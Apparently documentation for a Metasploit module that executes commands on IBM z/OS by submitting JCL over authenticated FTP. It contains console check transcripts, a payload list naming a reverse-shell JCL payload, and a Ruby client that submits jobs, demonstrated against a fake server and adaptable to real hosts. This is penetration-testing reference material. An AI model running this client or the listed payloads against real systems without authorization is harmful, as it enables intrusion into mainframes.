z/OS JCL authorized FTP-based command execution - hints & tips

In order to use this exploit, you must have valid credentials on the target z/OS system. Those credentials must be able to log in over FTP and submit jobs through `SITE FILE=JES` (this is exactly what the check function tests), not merely upload files. If in doubt, run the check function of the exploit before attempting exploitation.
## Vulnerable Application

This exploit was tested against the FTP daemons shipped with z/OS versions 1.13 and 2.1.
## Payloads

If the exploit works, any JCL the user has rights to submit can be submitted; by default the job runs under the submitting user's identity, so the payload is limited by whatever authority that user has been granted on the target.

Use the `cmd` type payloads under `mainframe` with `jcl` in the payload name, e.g.:
```
msf exploit(ftp_jcl_creds) > show payloads

Compatible Payloads
===================

   Name                             Disclosure Date  Rank    Description
   ----                             ---------------  ----    -----------
   cmd/mainframe/generic_jcl                         normal  Generic JCL Test for Mainframe Exploits
   cmd/mainframe/reverse_shell_jcl                   normal  Z/OS (MVS) Command Shell, Reverse TCP
```
## Verification Steps

A successful check of the exploit will look like this:
```
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
RHOST => 10.10.10.1
msf exploit(ftp_jcl_creds) > info

       Name: FTP JCL Execution
     Module: exploit/mainframe/ftp/ftp_jcl_creds
   Platform: Mainframe
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2013-05-12

Available targets:
  Id  Name
  --  ----
  0   auto

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FTPPASS  password         no        The password for the specified username
  FTPUSER  ftptest          no        The username to authenticate as
  RHOST    10.10.10.1       yes       The target address
  RPORT    21               yes       The target port
  SLEEP    5                no        Time to wait before checking if job has completed.

Payload information:

Description:
  Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
  valid credentials on the target system

msf exploit(ftp_jcl_creds) > check

[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```
## Debugging

If the exploit or the check is not working, enable the VERBOSE and FTPDEBUG options and run it again. FTPDEBUG prints every command sent and reply received on the FTP control channel, which shows exactly where the exchange stops (banner, login, or the `SITE FILE=JES` command). On a vulnerable system the output should look similar to the below.
```
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check

[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] 10.10.10.1:21 - Connected to target FTP server.
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
[*] 10.10.10.1:21 - Sending password...
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
[+] 10.10.10.1:21 - Successfully connected to FTP server.
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
```
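
The control-channel exchange the check performs above (banner, USER/PASS, `SITE FILE=JES`), followed by the JCL submission the exploit then makes to the JES internal reader, as an added example written for this page; it is not the Metasploit module's code. The client speaks plain FTP over any object with `gets`/`write`, so it is driven here by a constructed fake server whose USER, PASS and SITE replies are copied from the FTPDEBUG transcript above. The PASV, STOR and `250-It is known to JES as JOBnnnnn` replies, the `JesFtpClient`/`FakeZosFtp` names, the `run_demo` helper and the two-card IEFBR14 job are assumptions made for the example.

```ruby
require 'stringio'

# Minimal FTP control-channel client for the z/OS JES path. ctrl needs #gets/#write;
# data_open is a callable (host, port) -> IO for the passive data connection.
class JesFtpClient
  ZOS_BANNER = /IBM FTP CS/                # banner text seen in the debug output
  JOBID      = /known to JES as (JOB\d+)/  # assumed wording of the STOR completion reply
  def initialize(ctrl, data_open)
    @ctrl, @data_open = ctrl, data_open
  end
  def reply                                # one reply, following "nnn-" lines until "nnn "
    lines = []
    while (line = @ctrl.gets)
      lines << line.chomp
      break if line.start_with?("#{lines[0][0, 3]} ")
    end
    raise IOError, 'control connection closed' if lines.empty?
    [lines[0][0, 3].to_i, lines.join("\n")]
  end
  def cmd(line)
    @ctrl.write("#{line}\r\n")
    reply
  end
  def check(user, pass)                    # same decision the module's check makes
    code, banner = reply
    return [:not_zos, banner] unless code == 220 && banner =~ ZOS_BANNER
    code, msg = cmd("USER #{user}")
    code, msg = cmd("PASS #{pass}") if code == 331
    return [:login_failed, msg] unless code == 230
    code, msg = cmd('SITE FILE=JES')
    code == 200 ? [:vulnerable, msg] : [:jes_refused, msg]
  end
  def submit(jcl)                          # push JCL into JES; returns the assigned job id
    code, msg = cmd('PASV')
    raise "PASV refused: #{msg}" unless code == 227
    h = msg.scan(/\d+/).last(6).map(&:to_i)          # h1,h2,h3,h4,p1,p2
    data = @data_open.call(h[0, 4].join('.'), h[4] * 256 + h[5])
    code, msg = cmd('STOR JOB.JCL')                   # the name is not used for a JES submission
    raise "STOR refused: #{msg}" unless [125, 150].include?(code)
    jcl.each_line { |l| data.write("#{l.chomp}\r\n") }
    data.close
    code, msg = reply
    raise "transfer failed: #{msg}" unless code == 250
    msg[JOBID, 1]
  end
end

# Constructed stand-in for the z/OS FTP server: USER/PASS/SITE replies come from the
# FTPDEBUG transcript above; the PASV, STOR and "250-It is known to JES" replies are assumed.
class FakeZosFtp
  attr_accessor :data, :jobs                          # data: passive link opened by the client
  def initialize(user:, pass:, jes_allowed: true)
    @user, @pass, @jes_allowed, @pending, @jes, @jobs = user, pass, jes_allowed, '', false, []
    @out = ["220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n",
            "220 Connection will close if idle for more than 5 minutes.\r\n"]
    u = user.upcase                                   # verb => [accepted reply, rejected reply]
    @replies = {
      'USER' => ["331 Send password please.\r\n", nil],
      'PASS' => ["230 #{u} is logged on. Working directory is \"#{u}.\".\r\n", "530 PASS command failed\r\n"],
      'SITE' => ["200 SITE command was accepted\r\n", "500 SITE command was rejected\r\n"],
      'PASV' => ["227 Entering Passive Mode (10,10,10,1,4,1)\r\n", nil],
      'STOR' => ["125 Sending Job to JES internal reader FIXrecfm 80\r\n", "550 FILE=JES is not in effect\r\n"]
    }
  end
  # Control-channel read. A closed data link means the job "arrived" in JES; it is recorded
  # under the login user, which is the joblog trail the notes below refer to.
  def gets
    if @out.empty? && @data && @data.closed?
      id = format('JOB%05d', @jobs.size + 1)
      @jobs << { id: id, name: @data.string[%r{\A//(\S+)\s+JOB}, 1], user: @user, jcl: @data.string }
      @data = nil
      @out.push("250-It is known to JES as #{id}\r\n", "250 Transfer completed successfully.\r\n")
    end
    @out.shift
  end
  def write(raw)
    verb, arg = raw.chomp.split(' ', 2)
    verb, arg = verb.to_s.upcase, arg.to_s
    ok = case verb
         when 'USER' then @pending = arg
         when 'PASS' then @pending.casecmp(@user).zero? && arg == @pass
         when 'SITE' then @jes = @jes_allowed && arg.upcase == 'FILE=JES'
         when 'STOR' then @jes
         else true
         end
    accepted, rejected = @replies.fetch(verb, ["500 Unknown command\r\n", nil])
    @out << (ok ? accepted : rejected)
  end
end

# Constructed two-card job: IEFBR14 does nothing, which is all a submission test needs.
SAMPLE_JCL = "//FTPTESTA JOB (ACCT),'JES CHECK',CLASS=A,MSGCLASS=X\n//STEP1    EXEC PGM=IEFBR14\n"
# Run the check against the fake and, if it passes, submit the sample job.
def run_demo(pass: 'password', jes_allowed: true)
  srv    = FakeZosFtp.new(user: 'ftptest', pass: 'password', jes_allowed: jes_allowed)
  client = JesFtpClient.new(srv, ->(_host, _port) { srv.data = StringIO.new })
  status, detail = client.check('ftptest', pass)
  job_id = status == :vulnerable ? client.submit(SAMPLE_JCL) : nil
  { status: status, detail: detail, job_id: job_id, jobs: srv.jobs }
end
puts run_demo.inspect if __FILE__ == $PROGRAM_NAME
```

To point the client at a real host, pass a `TCPSocket` to port 21 as `ctrl` and a `data_open` that returns `TCPSocket.new(host, port)`; the fake's `jobs` list is there to make the point of the notes below concrete, since every submission is recorded in JES under the user that logged in.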
## Notes

Every job submitted this way leaves a joblog in the JES spool under the credentials used, so the activity is attributable to that user and visible to the target's operators; account for that output in your reporting and clean-up.